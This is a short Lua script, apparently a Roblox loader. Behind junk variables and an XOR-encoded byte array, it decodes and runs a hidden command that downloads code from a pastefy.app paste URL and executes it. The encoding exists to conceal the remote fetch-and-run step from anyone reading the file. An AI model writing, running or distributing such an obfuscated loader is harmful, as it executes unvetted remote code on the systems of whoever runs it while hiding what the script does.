local _111IO = 55011 * 3
local _1IlI1 = 97405 * 5
local _lIOOI = 74137 * 4
local _I1IOO = 51640 * 1
local __k=192
local __b={172,175,161,164,179,180,178,169,174,167,232,167,161,173,165,250,136,180,180,176,135,165,180,232,226,168,180,180,176,179,250,239,239,176,161,179,180,165,166,185,238,161,176,176,239,133,132,165,178,245,178,173,152,239,178,161,183,226,233,233,232,233}
local function __x(a,b) local r,p=0,1 while a>0 or b>0 do local ab,bb=a%2,b%2 if ab~=bb then r=r+p end a,b,p=(a-ab)/2,(b-bb)/2,p*2 end return r end
local __chars={}
for __i=1,#__b do __chars[__i]=string.char(__x(__b[__i],__k)) end
local __s=table.concat(__chars)
local __ld=loadstring or load
local __f,__err=__ld(__s)
if not __f then error(__err) end
return __f()
